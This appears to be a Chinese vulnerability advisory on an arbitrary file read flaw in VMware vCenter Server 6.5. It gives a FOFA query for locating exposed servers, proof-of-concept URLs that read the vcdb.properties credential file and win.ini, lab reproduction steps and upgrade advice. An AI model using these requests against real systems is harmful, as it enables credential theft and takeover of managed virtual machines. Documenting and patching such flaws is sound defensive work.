1.影响版本

VMware vCenter Server 6.5.0a至f版本（之前版本也可能受影响）

2.资产查找

FOFA：title="ID_VC_Welcome"

3.漏洞描述

        VMware vCenter存在任意文件读取漏洞，远程攻击者通过访问开放在外部的vCenter 控制台，可以任意读取主机上的文件。(可读取 vCenter 配置文件获得管理帐号密码)进而控制 vCenter 平台及其管理的虚拟机集群。

4.漏洞POC

1)https://主机地址/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties

2)https://主机地址/eam/vib?id=C:/windows/win.ini

5.漏洞复现

1)在服务器部署vcenter-server，通过浏览器访问vCenter控制台

https://192.168.210.152/vsphere-client/?csp

2)访问漏洞POC

https://192.168.210.152/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties

https://192.168.210.152/eam/vib?id=C:/windows/win.ini

6.修复建议

Vmware 确认该漏洞已在 6.5u1 版本中修复，请尽快升级至安全版本或更高版本。